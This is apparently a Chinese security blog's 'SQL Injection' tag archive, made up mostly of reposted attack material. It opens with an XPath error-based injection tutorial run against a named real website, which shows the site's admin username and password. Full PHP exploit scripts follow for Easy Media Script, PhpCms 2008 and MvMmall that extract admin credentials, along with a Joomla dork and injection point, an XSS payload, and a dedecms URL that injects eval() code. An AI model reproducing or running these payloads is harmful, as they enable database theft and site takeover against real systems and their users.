存档

文章标签 ‘SQL Injection’

Xpath SQL Injection

2012年2月10日 没有评论 43 views

So a few XPath Injection tutorials have been getting posted, and since I haven't seen much info on the updatexml method, I'd thought I'd make a quick tutorial for it.Now I'll be going over both methods just for the sake of adding it to my mega-thread.

Extract Value

I'll be using this site as an example.

Code:
http://leadacidbatteryinfo.org/newsdetail.php?id=51

Version (ExtractValue)

Code:
+and+extractvalue(rand(),concat(0x7e,version()))--

This will return our XPATH Syntax error, and give us our version.
This is what my link looks like.
Code:http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,version()))--

Code:XPATH syntax error: '~5.1.52-log'

 

You should get your version.

Getting The Tables (Extract Value)

 

Code:+and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema. ​tables+where+table_schema=database()+limit+0,1)))--
My link looks like this.
Code:http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,(select+table_name+from ​+information_schema.tables+where+table_schema=database()+limit+0,1)))--

So lets load it up and see if we get our first table name!

Code:

XPATH syntax error: '~pdigclicks'
Woot it worked! Now we just increment in our limit statement until we find our table we want columns from.

Code:http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,(select+table_name+from ​ +information_schema.tables+where+table_schema=database()+limit+[b]1[/b],1)))--

Code:

XPATH syntax error: '~pdigengine'

(#‵′)凸
We want users or admin..
Code:http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,(select+table_name+from ​ +information_schema.tables+where+table_schema=database()+limit+[b]2[/b],1)))--

Code:

XPATH syntax error: '~pdigexcludes'

 

Code:http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,(select+table_name+from ​ +information_schema.tables+where+table_schema=database()+limit+[b]10[/b],1)))--
Code:
XPATH syntax error: '~tbladmin'

Woot, now let's get the columns.

 

Getting The Columns (ExtractValue)
First off, we want to convert our table name to hex.
My table name was tbladmin.
Whenever you convert something to hex, you add 0x in front of it.
It tells the site to read the hex value.
The hex of tbladmin is 74626c61646d696e
So it should look like this.
Code:0x74626c61646d696e
Now to get our columns, we change our syntax a bit, but it's still generally the same idea.
Code:+and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema ​.columns+where+table_name=0xTABLE_HEX+limit+0,1)))--]
Of course, replace TABLE_HEX with the hex value of your table name.
My link looks like this.
Code:http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,(select+column_name+fro ​ m+information_schema.columns+where+table_name=0x74626c61646d696e+limit+0,1)))--

Code:
XPATH syntax error: '~adminid'

Now use increment in your limit statement until you find the columns you want.

 

Getting Data Out of Columns (ExtractValue)

Now that you've got your column names, you're going to want to put them in a concat statement.

Code:+and+extractvalue(rand(),concat(0x7e,(select+concat(column1,0x7e,column2)+from+T​ABLENAME+limit+0,1)))--
My columns I wanted were username and password, the 0x7e is the hex value of "~" which I'll use as a seperator.
My link looks like this.
Code:http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,(select+concat(username ​,0x7e,password)+from+tbladmin+limit+0,1)))--
And as you can see, we get our XPath error with the admin login.

Code:XPATH syntax error: '~ishir~ishir123'

UpdateXML

 

Getting The Version (UpdateXML)

Code:+and+updatexml(0x7e,concat(0x7e,(version())),0)--

My link looks like this..

Code:leadacidbatteryinfo.org/newsdetail.php?id=52+and+updatexml(0x7e,concat(0x7e,(version())),0)--

We get our XPATH Error that returns the version.
Code:

XPATH syntax error: '~5.1.52-log'

Getting The Tables (UpdateXML)

Code:+and+updatexml(0x7e,concat(0x7e,((select+concat(table_name)+from+information_sch ​ema.tables+where+table_schema=database()+limit+0,1))),0)--

My link looks like this..

Code:http://www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+updatexml(0x7e,concat(0x7e,((select+concat(table_name)+ ​ from+information_schema.tables+where+table_schema=database()+limit+0,1))),0)--


Code:

XPATH syntax error: '~pdigclicks'

Now we know our first table is called pdigclicks. Let's see what else is in here....
Code:http://www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+updatexml(0x7e,concat(0x7e,((select+concat(table_name)+ ​ from+information_schema.tables+where+table_schema=database()+limit+1,1))),0)--

Code:
XPATH syntax error: '~pdigengine'

For the sake of time, I know the table name I want is tbladmin.
Code:leadacidbatteryinfo.org/newsdetail.php?id=52+and+updatexml(0x7e,concat(0x7e,((select+concat(table_name)+ ​ from+information_schema.tables+where+table_schema=database()+limit+10,1))),0)--
And there's our table.
Code:

XPATH syntax error: '~tbladmin'

Now let's get the columns from the table.

Getting Columns (UpdateXML)

Now it's the same idea, we just change the tables to columns, from the table name.

Code:+and+updatexml(0x7e,concat(0x7e,((select+concat(column_name)+from+information_sc ​hema.columns+where+table_name=0xTABLE_HEX+limit+0,1))),0)--

Now my table name was tbladmin, so I convert that to hex and get 74626c61646d696e

My link looks like this.

Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+updatexml(0x7e,concat(0x7e,((select+concat(column_name) ​ +from+information_schema.columns+where+table_name=0x74626c61646d696e+limit+0,1)) ​),0)--

 

Code:
XPATH syntax error: '~adminid'


Getting Data (UpdateXML)

Now once you've got your columns, concatenate them and get the from the table you want.
Code:

leadacidbatteryinfo.org/newsdetail.php?id=52+and+updatexml(0x7e,concat(0x7e,((select+concat(column1,0x7e ​,column2)+from+TABLENAME+limit+0,1))),0)--

My link looks like this..
Code:

http://www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+updatexml(0x7e,concat(0x7e,((select+concat(username,0x7 ​e,password)+from+tbladmin+limit+0,1))),0)--
Code:
XPATH syntax error: '~ishir~ishir123'

分类: 技术文章 标签: ,

Easy Media Script SQL Injection Vulnerability

2011年6月6日 没有评论 69 views

<?php

 

if(!$argv[1])

die("

 

Usage : php exploit.php [site]

Example : php exploit.php http://site.tld/[PATH]/

 

");

print_r("

 

# Tilte......: [ Easy Media Script SQL Injection ]

# Author.....: [ Lagripe-Dz ]

# Date.......: [ 27-o5-2o11 ]

# Location ..: [ ALGERIA ]

# HoMe ......: [ Sec4Ever.com & Lagripe-Dz.org ]

# Download ..: [ http://easymediascript.com/ ]

# Gr33tz ....: [ All Sec4ever Member'z ]

 

-==[ ExPloiT ]==-

 

# SQL Inj : http://site/ems/?watch=1'

# XSS : http://site/ems/?go=\"><

ScRiPt>alert(0)</ScRiPt>

 

-==[ Start ]==-

 

");

 

$t=array("db_user "=>"user()","db_version"=>"version()","db_name

"=>"database()",

"UserName "=>"user","Password "=>"pass");

 

foreach($t as $r=>$y){

 

<A href="mailto:$x=@file_get_contents($argv[1].%22?watch=-1'/**//**//*!uNiOn*//**//**//*!sElEcT*//**//**/1,group_concat(0x".bin2hex("<$r>").",$y,0x".bin2hex("<$r>")."),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/**//**/fRoM/**//**/ip_admin%23">$x=@file_get_contents($argv[1]."?watch=-1'/**//**//*!uNiOn*//**//**//*!sElEcT*//**//**/1,group_concat(0x".bin2hex("<$r>").",$y,0x".bin2hex("<$r>")."),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/**//**/fRoM/**//**/ip_admin%23");

 

preg_match_all("{<$r>(.*?)<$r>}i",$x, $dz);

 

echo $u = ($dz[1][0]) ? "[-] $r : ".$dz[1][0]."\n" : "[-] $r : Failed

!\n";

 

}

echo "[-] AdminPanel : ".$argv[1]."ip-admin/login.php\n";

 

print_r("

-==[ Finished ]==-

");

 

# END .. !

 

?>

 

分类: 技术文章 标签:

Joomla Component com_hello SQL Injection Vulnerability

2011年5月12日 没有评论 80 views

Author : g3mbeLz_YCL
Site : www.yogyacarderlink.web.id
Date : Mei, 09 2011.
Location : Yogyakarta, Indonesia.
Time Zone : GMT +6:00
Dork Google: inurl:"com_hello"

[x] X.P.L:
../public_html/index.php?option=com_hello&view=hello&catid=74&secid=[SQLi] <--- Your Skill...!!!

- Shouts & Greetz:
All YOGYACARDERLINK CREW...!!!
I Love You... :-)

[x] Bugs Found By: g3mbeLz_YCL.
We

分类: 技术文章 标签: ,

Havij v1.1 Advanced SQL Injection

2010年6月6日 没有评论 413 views


阅读全文...

分类: 资源共享 标签: ,

PhpCms 2008 Sp3 Blind SQL Injection Exploit(2)

2010年5月8日 没有评论 164 views

<?php

ini_set("max_execution_time",0);

error_reporting(7);

function usage()

{

global $argv;

exit(

"\n--+++============================================================+++--".

"\n--+++====== PhpCms 2008 Sp3 Blind SQL Injection Exploit========+++--".

"\n--+++============================================================+++--".

"\n\n[+] Author: My5t3ry".

"\n[+] Team: [url]http://www.t00ls.net[/url]".

"\n[+] Usage: php ".$argv[0]." <hostname> <path>".

"\n[+] Ex.: php ".$argv[0]." localhost /yp".

"\n\n");

}

function query($pos, $chr, $chs)

{

global $prefix;

switch ($chs){

case 1:

$query = "1=1 and if((ascii(substring((select username from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}),benchmark(10000000,md5(1)),1)#";

break;

case 2:

$query = "1=1 and if((ascii(substring((select password from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}),benchmark(10000000,md5(1)),1)#";

break;

case 3:

$query = "1=1 and if((length((select username from ".$prefix."member where groupid=1 limit 0,1))={$pos}),benchmark(10000000,md5(1)),1)#";

break;

}

$query = str_replace(" ", "/**/", $query);

$query = urlencode($query);

return $query;

}

function exploit($hostname, $path, $pos, $chr, $chs)

{

$chr = ord($chr);

$conn = fsockopen($hostname, 80);

$postdata = "q=&action=searchlist&where=".query($pos, $chr, $chs);

$message = "POST ".$path."/product.php HTTP/1.1\r\n";

$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";

$message .= "Accept-Language: zh-cn\r\n";

$message .= "Content-Type: application/x-www-form-urlencoded\r\n";

$message .= "Accept-Encoding: gzip, deflate\r\n";

$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";

$message .= "Host: $hostname\r\n";

$message .= "Content-Length: ".strlen($postdata)."\r\n";

$message .= "Connection: Close\r\n\r\n";

$message .= $postdata;

//echo $message;

$time_a = time();

fputs($conn, $message);

while (!feof($conn))

$reply .= fgets($conn, 1024);

$time_b = time();

fclose($conn);

//echo $time_b - $time_a."\r\n";

if ($time_b - $time_a > 4)

return true;

else

return false;

}

function crkusername($hostname, $path, $chs)

{

global $length;

$key = "abcdefghijklmnopqrstuvwxyz0123456789";

$chr = 0;

$pos = 1;

echo "[+] username: ";

while ($pos <= $length)

{

if (exploit($hostname, $path, $pos, $key[$chr], $chs))

{

echo $key[$chr];

$chr = 0;

$pos++;

}

else

$chr++;

}

echo "\n";

}

function crkpassword($hostname, $path, $chs)

{

$key = "abcdef0123456789";

$chr = 0;

$pos = 1;

echo "[+] password: ";

while ($pos <= 32)

{

if (exploit($hostname, $path, $pos, $key[$chr], $chs))

{

echo $key[$chr];

$chr = 0;

$pos++;

}

else

$chr++;

}

echo "\n\n";

}

function lengthcolumns($hostname, $path, $chs)

{

echo "[+] username length: ";

$exit = 0;

$length = 0;

$pos = 0;

$chr = 0;

while ($exit==0)

{

if (exploit($hostname, $path, $pos, $chr, $chs))

{

$exit = 1;

$length = $pos;

}

else

$pos++;

}

echo $length."\n";

return $length;

}

function getprefix($hostname, $path)

{

echo "[+] prefix: ";

$conn = fsockopen($hostname, 80);

$request = "GET {$path}/product.php?q=&action=searchlist&where=%23 HTTP/1.1\r\n";

$request .= "Host: {$hostname}\r\n";

$request .= "Connection: Close\r\n\r\n";

fputs($conn, $request);

while (!feof($conn))

$reply .= fgets($conn, 1024);

fclose($conn);

preg_match('/FROM `(.+)yp_product/ie',$reply,$match);

if ($match[1])

return $match[1];

else

return false;

}

if ($argc != 3)

usage();

$prefix="";

$hostname = $argv[1];

$path = $argv[2];

$prefix = getprefix($hostname, $path);

if ($prefix)

{

echo $prefix."\r\n";

$length = lengthcolumns($hostname, $path, 3);

crkusername($hostname, $path, 1);

crkpassword($hostname, $path, 2);

}

else

{

exit("Exploit failed");

}

?>

分类: 矩阵毒刺 标签: , ,

PhpCms 2008 Sp3 Blind SQL Injection Exploit(1)

2010年5月8日 没有评论 158 views

<?php

ini_set("max_execution_time",0);

error_reporting(7);

function usage()

{

global $argv;

exit(

"\n--+++============================================================+++--".

"\n--+++====== PhpCms 2008 Sp3 Blind SQL Injection Exploit========+++--".

"\n--+++============================================================+++--".

"\n\n[+] Author: My5t3ry".

"\n[+] Team: [url]http://www.t00ls.net[/url]".

"\n[+] Usage: php ".$argv[0]." <hostname> <path>".

"\n[+] Ex.: php ".$argv[0]." localhost /yp".

"\n\n");

}

function query($pos, $chr, $chs)

{

global $prefix;

switch ($chs){

case 0:

$query = "#";

break;

case 1:

$query = " ascii(substring((select username from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}#";

break;

case 2:

$query = " ascii(substring((select password from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}#";

break;

case 3:

$query = " length((select username from ".$prefix."member where groupid=1 limit 0,1))={$pos}#";

break;

}

$query = str_replace(" ", "/**/", $query);

$query = urlencode($query);

return $query;

}

function exploit($hostname, $path, $pos, $chr, $chs)

{

$chr = ord($chr);

$conn = fsockopen($hostname, 80);

//print_r($conn);

/*if (!$conn){

exit("\r\n[-] No response from $conn");

}*/

$postdata = "q=&action=searchlist&where=".query($pos, $chr, $chs);

$message = "POST ".$path."/product.php HTTP/1.1\r\n";

$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";

$message .= "Accept-Language: zh-cn\r\n";

$message .= "Content-Type: application/x-www-form-urlencoded\r\n";

$message .= "Accept-Encoding: gzip, deflate\r\n";

$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";

$message .= "Host: $hostname\r\n";

$message .= "Content-Length: ".strlen($postdata)."\r\n";

$message .= "Connection: Close\r\n\r\n";

$message .= $postdata;

//echo $message;

fputs($conn, $message);

while (!feof($conn))

$reply .= fgets($conn, 1024);

fclose($conn);

return $reply;

}

function crkusername($hostname, $path, $chs)

{

global $length;

$key = "abcdefghijklmnopqrstuvwxyz0123456789";

$chr = 0;

$pos = 1;

echo "[+] username: ";

while ($pos <= $length)

{

$response = exploit($hostname, $path, $pos, $key[$chr], $chs);

preg_match ("/<span class=\"time\">(.+)<\/span><\/strong>/i", $response, $match);

if (strlen(trim($match[1])) != 0)

{

echo $key[$chr];

$chr = 0;

$pos++;

}

else

$chr++;

}

echo "\n";

}

function crkpassword($hostname, $path, $chs)

{

$key = "abcdef0123456789";

$chr = 0;

$pos = 1;

echo "[+] password: ";

while ($pos <= 32)

{

$response = exploit($hostname, $path, $pos, $key[$chr], $chs);

preg_match ("/<span class=\"time\">(.+)<\/span><\/strong>/i", $response, $match);

if (strlen(trim($match[1])) != 0)

{

echo $key[$chr];

$chr = 0;

$pos++;

}

else

$chr++;

}

echo "\n\n";

}

function lengthcolumns($hostname, $path, $chs)

{

echo "[+] username length: ";

$exit = 0;

$length = 0;

$pos = 1;

$chr = 0;

while ($exit==0)

{

$response = exploit($hostname, $path, $pos, $chr, $chs);

preg_match ("/<span class=\"time\">(.+)<\/span><\/strong>/i", $response, $match);

if (strlen(trim($match[1])) != 0)

{

$exit = 1;

$length = $pos;

}

else

$pos++;

}

echo $length."\n";

return $length;

}

function getprefix($hostname, $path, $chs)

{

echo "[+] prefix: ";

$pos = 0;

$chr = 0;

$response = exploit($hostname, $path, $pos, $chr, $chs);

preg_match('/FROM `(.+)yp_product/ie',$response,$match);

if ($match[1])

return $match[1];

else

return false;

}

if ($argc != 3)

usage();

$prefix="";

$hostname = $argv[1];

$path = $argv[2];

$prefix = getprefix($hostname, $path, 0);

if ($prefix)

{

echo $prefix."\r\n";

$length = lengthcolumns($hostname, $path, 3);

crkusername($hostname, $path, 1);

crkpassword($hostname, $path, 2);

}

else

{

exit("\r\n[-] Exploit failed");

}

?>

分类: 矩阵毒刺 标签: , ,

SFX-SQLi SQL2005/2008注入工具

2010年4月14日 没有评论 530 views

利用sql server 的for xml 语法可以一次性获取多行结果,加快了注入速度。支持SQL2005/2008的注入。

下载地址:

SFX-SQLi Tool (binaries)A tool which automates the process (requires Microsoft .NET Framework 2.0) - v1.1

SFX-SQLi Tool (source code)Source code of the tool (available in VB.NET for Visual Studio 2008) - v1.1

WebVulnerableSql (ASP.NET)Vulnerable web application sample for testing (includes executable and source code)

分类: 资源共享 标签: ,

SQL通用防注入程序 20091206版

2009年12月6日 没有评论 125 views

本不打算对这个小东东做更新了,不过还是经常收到一些朋友的咨询,以及在使用中遇到了一些问题,今天又收到朋友来信问关于这个东东的问题,正好今天公司值班也没啥事情,就顺手更新一下了。顺便统一在对以前一些朋友提出的问题做下解答。

主要解决了以下几个问题:

  1. 更新搜索引擎跳转引起的误报。其实这个是由于之前的默认的过滤规则中有%的缘故,如果有的网站统计了访问来源的话,就有可能导致搜索引擎过来的访客报sql注入,无法访问,20091206版中删除了对于%和*的过滤。
  2. 修改数据库访问路径为绝对路径。原来的是采用虚拟路径访问数据库的,如果有的朋友部署的目录比较奇怪的话,可能会导致找不到sql防注入的数据库,20091206版本不会有这个问题了,可以支持将数据库放之非web目录。
  3. 修改原来的安全页面功能为安全表单。 原来的安全页面功能是为了防止后台添加数据的时候,存在sql注入过滤关键字字符而设置了,本版本修改了安全页面功能为安全表单,将误报白名单细化到了表 单。使用方法:如果发现本系统影响了你的网站正常的添加数据,可以将你认为安全的表单添加至安全表单,可通过管理页面查看影响的参数,然后将其添加至后台 管理-》参数设置中的安全表单,并启用安全表单即可。
  4. 对后台界面做了优化,实在看不下去以前的后台界面了,太丑了。

代码继续托管至Google,访问地址:http://code.google.com/p/defencesqlinject/

本地下载:/attachments/sql_20091206.rar

如果使用过程中发现问题,请留言或者Email给我。

此为免费程序,可随意使用,不过由于本人已工作,时间有限,恕不提供免费服务,请见谅。

分类: 资源共享 标签: ,

MvMmall_V5.5.1 Blind SQL Injection Exploit

2009年9月21日 没有评论 81 views

利用代码如下:

< ?php
ini_set("max_execution_time",0);
error_reporting(7);

if ($argc != 4)
usage ();
$hostname = $argv [1];
$path = $argv [2];
$userid = $argv [3];
$prefix = "mvm_";
//$key = "abcdefghijklmnopqrstuvwxyz0123456789";
$pos = 1;
$chr = 0;

function usage ()
{
global $argv;
echo
"\n[+] MvMmall_V5.5.1 Blind SQL Injection Exploit".
"\n[+] Author: My5t3ry".
"\n[+] Site : http://hi.baidu.com/netstart".
"\n[+] Usage : php ".$argv[0]." ".
"\n[+] Ex. : php ".$argv[0]." localhost /shop 1".
"\n\n";
exit ();
}

function request ($hostname, $path, $query)
{
$fp = fsockopen ($hostname, 80);

if (!$fp) {
echo 'No response from '.$host; die;
}

$request = "GET {$path}/contrast.php?id={$query} HTTP/1.1\r\n".
"Host: {$hostname}\r\n".
"Connection: Close\r\n\r\n";

fputs ($fp, $request);

while (!feof ($fp))
$reply .= fgets ($fp, 1024);

fclose ($fp);
return $reply;
}

function lengthcolumns ($userid, $prefix)
{
global $path,$hostname;
$exit=0;
$length=0;
$i=0;
while ($exit==0)
{
$query = "-1) Or length((select member_id from ".$prefix."member_table Where uid={$userid}))=".$i."%23";

$query = str_replace (" ", "%20", $query);

$query = str_replace ("'", "%27", $query);

$reply = request ($hostname, $path, $query);

$i++;

preg_match ("/target=\"_blank\" title=\"(.+)\">

if ($i/>30) {die(" Exploit failed...");}

//echo $x [1];

if (strlen (trim ($x [1])) == 0)
$exit=0;
else
$exit=1;
}

$length=$i-1;

echo "[+]length -> ".$length;

return $length;
}

function exploit ($hostname, $path, $userid, $fld, $chr, $pos)
{
global $prefix;

$chr = ord ($chr);

$query = "-1) Or ASCII(SUBSTRING((SELECT {$fld} FROM ".$prefix."member_table WHERE uid={$userid}),{$pos},1))={$chr}%23";

$query = str_replace (" ", "%20", $query);

$query = str_replace ("'", "%27", $query);

$reply = request ($hostname, $path, $query);

preg_match ("/target=\"_blank\" title=\"(.+)\">

if (strlen (trim ($x [1])) == 0)
return false;
else
return true;
}

echo "\n-------------------------------------------------------------------------------\n\n";
echo " MvMmall_V5.5.1 Blind SQL Injection Exploit\n";
echo " By My5t3ry (http://hi.baidu.com/netstart)\n";
echo "\n-------------------------------------------------------------------------------\n\n";
echo "[~]Trying to get pre...\n";

$query = "-1))%23";

$reply = request ($hostname, $path, $query);

preg_match('/FROM `(.+)goods_table/ie',$reply,$match);

$prefix=$match[1];

if ($match[1]){echo "[+]Good Job!Wo Got The pre -/> ".$match[1]."\n";}else{die(" Exploit failed...");}

echo "[~]Trying to get username length...\n";

$length = lengthcolumns($userid, $prefix);

echo "\n[~]Trying to Crack...";
echo "\n[+]username -> ";

while ($pos < = $length)
{
$key = "abcdefghijklmnopqrstuvwxyz0123456789";

if (exploit ($hostname, $path, $userid, "member_id", $key [$chr], $pos))
{
echo $key [$chr];
$chr = -1;
$pos++;
}
$chr++;
}

$pos = 9;

echo "\n[+]password(md5) -> ";

while ($pos < = 24)
{
$key = "abcdef0123456789";

if (exploit ($hostname, $path, $userid, "member_pass", $key [$chr], $pos))
{
echo $key [$chr];
$chr = -1;
$pos++;
}
$chr++;
}

echo "\n[+]Done!";
echo "\n\n-------------------------------------------------------------------------------";
?>

分类: 技术文章 标签: , ,

DVBBS php v2.0 boardrule.php注入漏洞

2009年9月4日 没有评论 108 views

DVBBS php v2.0 boardrule.php注入漏洞

影响版本:
DVBBS php v2.0漏洞描述:
PHP2.0++功能介绍:
一、 断点数据库备份,保持所备份的数据和论坛数据同步;
二、 多种形式Url rewrite 伪静态,提高SEO;
三、 多线程信息采集,减少人工操作繁琐度;
四、 自动升级采用多线程断点续传PHP下载模块;
五、 国际论坛界中独创了一个文件安装论坛;
六、 创新、贴心的新发贴回贴模式正在启用---动网PHP2.0++再创佳绩;
七、 发挥PHP优点,大量采用成熟的缓存机制
八、 全优的后台搜索功能;
九、 用户体验

boardrule.php存在sql注入漏洞。
测试方法:

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
阅读全文...

分类: 技术文章 标签: , ,

dedecms 5.3 – 5.5注入漏洞

2009年8月28日 没有评论 343 views

作者:张恒
dedecms5.3和5.5系列版本存在重大注入漏洞,请注意以下操作有攻击性,仅供研究。利用此漏洞进行违法活动者,后果自负。

假设域名是:www.abc.com 攻击步骤如下:
1. 访问网址:

http://www.abc.com/plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>

可看见以下错误信息:
dede_1

阅读全文...

分类: 技术文章 标签: , , ,

Discuz!账号发放插件注入0day

2009年8月15日 没有评论 195 views

作者: 普瑞斯特

Discuz账号发放插件注入0day

插件名:2Fly礼品(序号)发放系统
漏洞文件:2fly_gift.php
版本:最新版
Exp:
阅读全文...

分类: 技术文章 标签: , , , ,